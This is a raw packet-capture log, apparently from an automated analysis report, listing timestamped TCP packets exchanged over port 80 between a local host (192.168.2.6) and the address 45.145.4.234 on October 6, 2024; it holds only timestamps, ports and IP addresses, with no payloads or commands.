                                                                                                                                                Oct 6, 2024 22:18:48.752032995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752068996 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.752088070 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.752202034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752213001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752223969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752268076 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.752279043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752289057 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752300024 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752310038 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752315044 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.752334118 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.752432108 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752443075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752453089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752465010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752475977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752480030 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752487898 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752504110 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752515078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752515078 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.752515078 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.752521038 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752531052 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.752533913 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752540112 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.752546072 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752557993 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752566099 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.752593040 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.752985954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.752996922 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753007889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753016949 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753026962 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753035069 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753038883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753051043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753062010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753070116 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753074884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753081083 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753088951 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753102064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753112078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753122091 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753130913 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753139019 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753171921 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753334045 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753351927 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753362894 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753374100 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753379107 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753386021 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753397942 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753403902 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753413916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753422976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753437042 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753453016 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753635883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753647089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753652096 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753655910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753671885 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753684044 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753689051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753700018 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753701925 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753712893 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753722906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753724098 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753735065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753746986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753757000 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753758907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753770113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753781080 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.753781080 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753797054 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753823996 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.753983021 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754019976 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.754101038 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754111052 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754122972 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754133940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754136086 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.754144907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754149914 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.754158020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754168034 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.754170895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754195929 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.754211903 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.754388094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754399061 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754407883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754417896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754427910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754436970 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.754437923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754450083 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754461050 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.754467010 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.754503012 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.754503012 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.837249994 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837292910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837302923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837353945 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.837413073 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.837450027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837462902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837472916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837483883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837493896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837512016 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.837528944 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837534904 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.837543011 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837563038 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.837591887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837594986 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.837603092 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837615967 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837625027 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.837625027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837635994 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837646008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837652922 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.837656975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837666035 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837675095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837682962 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.837707996 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.837807894 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837817907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837827921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837858915 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.837955952 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837965965 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837975025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837985992 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.837995052 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838001966 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838006020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838012934 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838018894 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838028908 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838037014 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838052988 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838078976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838083029 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838114977 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838191986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838202953 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838212967 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838222980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838233948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838236094 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838239908 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838251114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838259935 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838283062 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838395119 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838403940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838413954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838423967 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838438988 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838457108 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838551998 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838562012 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838571072 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838581085 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838588953 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838593006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838603020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838613033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838615894 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838634968 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838651896 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838730097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838742018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838752031 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838762999 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838781118 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838795900 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838870049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838880062 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838888884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838897943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838903904 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838907957 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838917971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838927984 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838932991 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838938951 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838951111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.838963985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.838984966 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.839134932 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839144945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839154005 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839162111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839170933 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839176893 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.839181900 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839191914 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839200020 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.839205027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839215994 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839224100 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.839226961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839262009 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.839271069 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.839432001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839442015 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839452028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839459896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839468956 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839477062 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.839481115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839492083 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839500904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839504957 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.839512110 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839521885 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839531898 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839540958 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839549065 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.839564085 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.839587927 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.839705944 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839718103 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839729071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839762926 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.839790106 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.839803934 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839814901 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839823008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839832067 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839842081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839852095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839858055 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.839862108 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839873075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.839885950 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.839904070 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.840040922 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840050936 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840059996 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840070009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840080023 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840096951 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.840117931 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.840478897 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840488911 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840498924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840507030 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840532064 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.840559006 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.840567112 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840574980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840603113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840610981 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840612888 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.840616941 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840670109 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.840701103 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840712070 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840719938 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840729952 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840742111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840755939 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.840773106 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.840795994 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.840872049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840883017 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840893030 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840897083 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840903997 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.840941906 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.935929060 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.935964108 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.935976028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.935987949 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.935998917 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936009884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936021090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936072111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936089993 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936135054 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936135054 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936254025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936300039 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936306953 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936319113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936356068 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936407089 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936419964 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936435938 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936445951 CEST806388545.145.4.234192.168.2.6
